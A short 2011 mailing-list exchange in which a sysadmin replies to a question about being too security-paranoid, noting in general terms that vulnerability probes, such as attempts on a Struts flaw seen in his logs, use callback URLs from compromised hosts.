On 5/9/2011 11:09 AM, Scott Silva wrote:
on 5/8/2011 10:46 AM Jason spake the following:
Hi All,
I want to know thoughts on if I am being to paranoid/security conscious.
<snip> You know what they say; "Just because you are paranoid does not mean that some one is NOT out to get you!"
I think the currently fashionable way to probe for vulnerabilities is to send URLs that will execute something that will contact a central server if they succeed, so it doesn't really matter what you do in the way of blocking/redirecting, etc. They are probably going to ignore the return status and are already running on distributed compromised hosts. At least that's the sort of thing I see regularly trying to exploit a struts vulnerability in our java web server's logs.